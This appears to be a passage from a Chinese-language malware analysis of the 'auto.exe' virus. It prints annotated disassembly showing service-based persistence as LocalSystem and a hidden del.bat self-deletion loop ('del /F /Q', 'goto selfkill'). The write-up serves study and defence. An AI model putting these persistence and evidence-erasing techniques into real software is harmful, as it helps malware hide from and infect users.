004030EE push 1
004030F0 lea eax, [ebp+var_110]
004030F6 push offset aErrorcontrol ; "ErrorControl"
004030FB push eax
004030FC call sub_402DC6 ; ErrorControl = 1
00403101 push [ebp+lpBinaryPathName]
00403104 lea eax, [ebp+var_110]
0040310A push offset aImagepath ; "ImagePath"
0040310F push eax
00403110 call SetVirusServiceKeys ; ImagePath = lpBinaryPathName
00403115 push offset aLocalsystem ; "LocalSystem"
0040311A lea eax, [ebp+var_110]
00403120 push offset aObjectname ; "ObjectName"
00403125 push eax
00403126 call SetVirusServiceKeys ; ObjectName = "LocalSystem"
0040312B push 2
0040312D lea eax, [ebp+var_110]
00403133 push offset aStart ; "Start"
00403138 push eax
00403139 call sub_402DC6 ; Start = 2
0040313E add esp, 48h ; pops the arguments of the six helper calls above (6 x 0Ch)
00403141 lea eax, [ebp+var_110]
00403147 push 10h
00403149 push offset aType ; "Type"
0040314E push eax
0040314F call sub_402DC6 ; Type = 10h
00403154 add esp, 0Ch
00403157 push 1
00403159 pop eax
0040315A cmp [ebp+arg_14], eax
0040315D jz short loc_40316D ; arg_14 == 1: one pass only
0040315F push [ebp+dwMilliseconds] ; dwMilliseconds
00403162 call ds:Sleep
00403168 jmp loc_402FF5 ; otherwise keep re-applying the settings
0040316D ; ----------------------------------------------------------------------------
0040316D
0040316D loc_40316D:
0040316D pop edi
0040316E pop esi
0040316F pop ebx
00403170 leave
00403171 retn
00403171 RegisterVirusService endp
}
00402BE6 push esi
00402BE7 call StartVirusService ; 启动病毒服务
{
; StartVirusService(lpServiceName): open the service control manager, open the named
; service and call StartServiceA with no arguments, then close both handles.
; No return value is set explicitly; eax holds whatever the last API call returned.
; As written, the SCM handle in edi is not closed when OpenServiceA fails
; (the jz at 00402F67 skips both CloseServiceHandle calls).
00402F3C StartVirusService proc near
00402F3C
00402F3C lpServiceName = dword ptr 0Ch
00402F3C
00402F3C push esi
00402F3D push edi
00402F3E push 0F003Fh ; dwDesiredAccess (SC_MANAGER_ALL_ACCESS)
00402F43 push 0 ; lpDatabaseName
00402F45 push 0 ; lpMachineName
00402F47 call ds:OpenSCManagerA ; Establish a connection to the service
00402F47 ; control manager on the specified computer
00402F47 ; and opens the specified database
00402F4D mov edi, eax ; edi = SCM handle
00402F4F test edi, edi
00402F51 jz short loc_402F80
00402F53 push 0F01FFh ; dwDesiredAccess (SERVICE_ALL_ACCESS)
00402F58 push [esp+4+lpServiceName] ; lpServiceName
00402F5C push edi ; hSCManager
00402F5D call ds:OpenServiceA
00402F63 mov esi, eax ; esi = service handle
00402F65 test esi, esi
00402F67 jz short loc_402F80
00402F69 push 0 ; lpServiceArgVectors
00402F6B push 0 ; dwNumServiceArgs
00402F6D push esi ; hService
00402F6E call ds:StartServiceA ; result is not checked
00402F74 push esi ; hSCObject
00402F75 mov esi, ds:CloseServiceHandle ; esi is reused as the function pointer after the handle was pushed
00402F7B call esi ; CloseServiceHandle
00402F7D push edi ; hSCObject
00402F7E call esi ; CloseServiceHandle
00402F80
00402F80 loc_402F80:
00402F80
00402F80 pop edi
00402F81 pop esi
00402F82 retn
00402F82 StartVirusService endp
}
00402BEC add esp, 1Ch
【第七宗罪】 毁尸灭迹
不要以为 auto.exe 是个头脑简单的家伙,它干了坏事以后也是要消灭罪证的。想知道如何删除正在运行的程序文件吗?仔细看看下面的代码:
; var_SysInfectFlag is cleared at 00402493 and set to 1 only at 0040287B, on the path where
; the module path contains the own-name string built from "au" + "to.e" + "xe" and the drive
; root was opened in Explorer. Despite its name, the flag therefore marks the copy running
; from a drive root, and that copy is left in place.
00402BEF cmp [ebp+var_SysInfectFlag], 0
00402BF3 jnz short loc_402BFA ; flag set (root copy): skip self-deletion
00402BF5 call Del_InfectingHost ; flag clear: remove the running file via del.bat; Del_InfectingHost itself
00402BF5 ; returns without deleting when the module path equals the system-directory copy (00401610-0040161B)
{
004012E2 Del_InfectingHost proc near
004012E2
004012E2 var_szDelCmdLine= byte ptr -408h
004012E2 var_szFilename = byte ptr -308h
004012E2 var_szSysDirName= byte ptr -208h
004012E2 Buffer = dword ptr -108h
004012E2 hObject = dword ptr -8
004012E2 NumberOfBytesWritten= dword ptr -4
004012E2
004012E2 push ebp
004012E3 mov ebp, esp
004012E5 sub esp, 408h
004012EB push ebx
004012EC push esi
004012ED push edi
004012EE mov edi, offset byte_410F20
…………………………
…………………………
00401577 lea eax, [ebp+var_szFilename]
0040157D push 0FFh ; nSize
00401582 push eax ; lpFilename
00401583 push ebx ; hModule
00401584 call ds:GetModuleFileNameA
0040158A lea eax, [ebp+var_szSysDirName]
00401590 push 0FEh ; uSize
00401595 push eax ; lpBuffer
00401596 call ds:GetSystemDirectoryA
0040159C test eax, eax
0040159E jnz short loc_4015A8
004015A0 or eax, 0FFFFFFFFh
004015A3 jmp loc_401838
004015A8 ; ----------------------------------------------------------------------------
004015A8
004015A8 loc_4015A8:
004015A8 lea eax, [ebp+var_szSysDirName]
004015AE push offset asc_410B74 ; "\\"
004015B3 push eax
004015B4 call strcat
004015B9 mov ebx, ds:lstrcpy
004015BF pop ecx
004015C0 pop ecx
004015C1 lea eax, [ebp+var_szSysDirName]
004015C7 push eax
004015C8 lea eax, [ebp+var_szDelCmdLine]
004015CE push eax
004015CF call ebx ; lstrcpy
004015D1 lea eax, [ebp+var_szDelCmdLine]
004015D7 push offset aDel_bat ; "del.bat"
004015DC push eax
004015DD call ds:lstrcat
004015E3 lea eax, [ebp+var_szSysDirName]
004015E9 push offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
004015EE push eax
004015EF call strcat
004015F4 mov esi, ds:CharUpperA
004015FA pop ecx
004015FB pop ecx
004015FC lea eax, [ebp+var_szSysDirName]
00401602 push eax ; lpsz
00401603 call esi ; CharUpperA
00401605 push eax
00401606 lea eax, [ebp+var_szFilename]
0040160C push eax ; lpsz
0040160D call esi ; CharUpperA
0040160F push eax
00401610 call ds:lstrcmp ; 比较当前目录是否为系统目录?
00401616 push 1
00401618 test eax, eax
0040161A pop edi
0040161B jz loc_401836 ; 是系统目录则放弃接下去的清除操作
00401621 mov esi, ds:Sleep
00401627 push edi ; dwMilliseconds
00401628 call esi ; Sleep
0040162A push edi ; dwMilliseconds
0040162B call esi ; Sleep
0040162D push edi ; dwMilliseconds
0040162E call esi ; Sleep
00401630 push edi ; dwMilliseconds
00401631 call esi ; Sleep
00401633 xor eax, eax
00401635 push eax ; hTemplateFile
00401636 push eax ; dwFlagsAndAttributes
00401637 push 2 ; dwCreationDisposition
00401639 push eax ; lpSecurityAttributes
0040163A push eax ; dwShareMode
0040163B lea eax, [ebp+var_szDelCmdLine]
00401641 push 40000000h ; dwDesiredAccess
00401646 push eax ; lpFileName
00401647 call ds:CreateFileA ; 建立del.bat毁灭证据
0040164D cmp eax, 0FFFFFFFFh
00401650 mov [ebp+hObject], eax
00401653 jz loc_40181E
00401659 lea eax, [ebp+Buffer]
0040165F push offset a@echoOff ; "@echo off\r\n"
00401664 push eax ; 偷偷干,屏幕上不准显示
00401665 call strcpy
0040166A pop ecx
0040166B pop ecx
0040166C push edi ; dwMilliseconds
0040166D call esi ; Sleep
0040166F push edi ; dwMilliseconds
00401670 call esi ; Sleep
00401672 push edi ; dwMilliseconds
00401673 call esi ; Sleep
00401675 push edi ; dwMilliseconds
00401676 call esi ; Sleep
00401678 push edi ; dwMilliseconds
00401679 call esi ; Sleep
0040167B push edi ; dwMilliseconds
0040167C call esi ; Sleep
0040167E push edi ; dwMilliseconds
0040167F call esi ; Sleep
00401681 push edi ; dwMilliseconds
00401682 call esi ; Sleep
00401684 push edi ; dwMilliseconds
00401685 call esi ; Sleep
00401687 push edi ; dwMilliseconds
00401688 call esi ; Sleep
0040168A push edi ; dwMilliseconds
0040168B call esi ; Sleep
0040168D push edi ; dwMilliseconds
0040168E call esi ; Sleep
00401690 mov esi, ds:lstrlen
00401696 lea eax, [ebp+NumberOfBytesWritten]
00401699 push 0 ; lpOverlapped
0040169B push eax ; lpNumberOfBytesWritten
0040169C lea eax, [ebp+Buffer]
004016A2 push eax
004016A3 call esi ; lstrlen
004016A5 mov edi, ds:WriteFile
004016AB push eax ; nNumberOfBytesToWrite
004016AC lea eax, [ebp+Buffer]
004016B2 push eax ; lpBuffer
004016B3 push [ebp+hObject] ; hFile
004016B6 call edi ; WriteFile
004016B8 lea eax, [ebp+Buffer]
004016BE push offset aSelfkill ; ":selfkill\r\n"
004016C3 push eax
004016C4 call strcpy
004016C9 pop ecx
004016CA lea eax, [ebp+NumberOfBytesWritten]
004016CD pop ecx
004016CE push 0 ; lpOverlapped
004016D0 push eax ; lpNumberOfBytesWritten
004016D1 lea eax, [ebp+Buffer]
004016D7 push eax
004016D8 call esi ; lstrlen
004016DA push eax ; nNumberOfBytesToWrite
004016DB lea eax, [ebp+Buffer]
004016E1 push eax ; lpBuffer
004016E2 push [ebp+hObject] ; hFile
004016E5 call edi ; WriteFile
004016E7 lea eax, [ebp+Buffer]
004016ED push offset aDelFQ ; "del /F /Q \""
004016F2 push eax ; 干完坏事就自杀
004016F3 call strcpy
004016F8 pop ecx
004016F9 lea eax, [ebp+NumberOfBytesWritten]
004016FC pop ecx
004016FD push 0 ; lpOverlapped
004016FF push eax ; lpNumberOfBytesWritten
00401700 lea eax, [ebp+Buffer]
00401706 push eax
00401707 call esi ; lstrlen
00401709 push eax ; nNumberOfBytesToWrite
0040170A lea eax, [ebp+Buffer]
00401710 push eax ; lpBuffer
00401711 push [ebp+hObject] ; hFile
00401714 call edi ; WriteFile
00401716 lea eax, [ebp+var_szFilename] ; 病毒文件名
0040171C push eax
0040171D lea eax, [ebp+Buffer]
00401723 push eax
00401724 call strcpy
00401729 pop ecx
0040172A lea eax, [ebp+NumberOfBytesWritten]
0040172D pop ecx
0040172E push 0 ; lpOverlapped
00401730 push eax ; lpNumberOfBytesWritten
00401731 lea eax, [ebp+Buffer]
00401737 push eax
00401738 call esi ; lstrlen
0040173A push eax ; nNumberOfBytesToWrite
0040173B lea eax, [ebp+Buffer]
00401741 push eax ; lpBuffer
00401742 push [ebp+hObject] ; hFile
00401745 call edi ; WriteFile
00401747 lea eax, [ebp+Buffer]
0040174D push offset asc_410B44 ; "\"\r\n"
00401752 push eax
00401753 call ebx ; lstrcpy
00401755 lea eax, [ebp+NumberOfBytesWritten]
00401758 push 0 ; lpOverlapped
0040175A push eax ; lpNumberOfBytesWritten
0040175B lea eax, [ebp+Buffer]
00401761 push eax
00401762 call esi ; lstrlen
00401764 push eax ; nNumberOfBytesToWrite
00401765 lea eax, [ebp+Buffer]
0040176B push eax ; lpBuffer
0040176C push [ebp+hObject] ; hFile
0040176F call edi ; WriteFile
00401771 lea eax, [ebp+Buffer]
00401777 push offset aIfExist ; "if exist \""
0040177C push eax
0040177D call ebx ; lstrcpy
0040177F lea eax, [ebp+NumberOfBytesWritten]
00401782 push 0 ; lpOverlapped
00401784 push eax ; lpNumberOfBytesWritten
00401785 lea eax, [ebp+Buffer]
0040178B push eax
0040178C call esi ; lstrlen
0040178E push eax ; nNumberOfBytesToWrite
0040178F lea eax, [ebp+Buffer]
00401795 push eax ; lpBuffer
00401796 push [ebp+hObject] ; hFile
00401799 call edi ; WriteFile
0040179B lea eax, [ebp+var_szFilename] ; 病毒文件名
004017A1 push eax
004017A2 lea eax, [ebp+Buffer]
004017A8 push eax
004017A9 call ebx ; lstrcpy
004017AB lea eax, [ebp+NumberOfBytesWritten]
004017AE push 0 ; lpOverlapped
004017B0 push eax ; lpNumberOfBytesWritten
004017B1 lea eax, [ebp+Buffer]
004017B7 push eax
004017B8 call esi ; lstrlen
004017BA push eax ; nNumberOfBytesToWrite
004017BB lea eax, [ebp+Buffer]
004017C1 push eax ; lpBuffer
004017C2 push [ebp+hObject] ; hFile
004017C5 call edi ; WriteFile
004017C7 lea eax, [ebp+Buffer]
004017CD push offset aGotoSelfkill ; "\" goto selfkill\r\n"
004017D2 push eax
004017D3 call ebx ; lstrcpy
004017D5 lea eax, [ebp+NumberOfBytesWritten]
004017D8 push 0 ; lpOverlapped
004017DA push eax ; lpNumberOfBytesWritten
004017DB lea eax, [ebp+Buffer]
004017E1 push eax
004017E2 call esi ; lstrlen
004017E4 push eax ; nNumberOfBytesToWrite
004017E5 lea eax, [ebp+Buffer]
004017EB push eax ; lpBuffer
004017EC push [ebp+hObject] ; hFile
004017EF call edi ; WriteFile
004017F1 lea eax, [ebp+Buffer]
004017F7 push offset dword_410B18
004017FC push eax
004017FD call ebx ; lstrcpy
004017FF push 0 ; lpOverlapped
00401801 lea eax, [ebp+NumberOfBytesWritten]
00401804 push eax ; lpNumberOfBytesWritten
00401805 lea eax, [ebp+Buffer]
0040180B push eax
0040180C call esi ; lstrlen
0040180E push eax ; nNumberOfBytesToWrite
0040180F lea eax, [ebp+Buffer]
00401815 push eax ; lpBuffer
00401816 push [ebp+hObject] ; hFile
00401819 call edi ; WriteFile
0040181B push 1
0040181D pop edi
0040181E
0040181E loc_40181E:
0040181E push [ebp+hObject] ; hObject
00401821 call ds:CloseHandle
00401827 lea eax, [ebp+var_szDelCmdLine]
0040182D push SW_HIDE ; uCmdShow
0040182F push eax ; lpCmdLine
00401830 call ds:WinExec ; 执行del.bat
00401836
00401836 loc_401836:
00401836 mov eax, edi
00401838
00401838 loc_401838:
00401838 pop edi
00401839 pop esi
0040183A pop ebx
0040183B leave
0040183C retn
0040183C Del_InfectingHost endp
}
00402BFA
【总结】
判处 auto.exe 病毒死刑,剥夺政治权利终身,此审为终审判决,不得上诉。
加个脱了壳的尸体: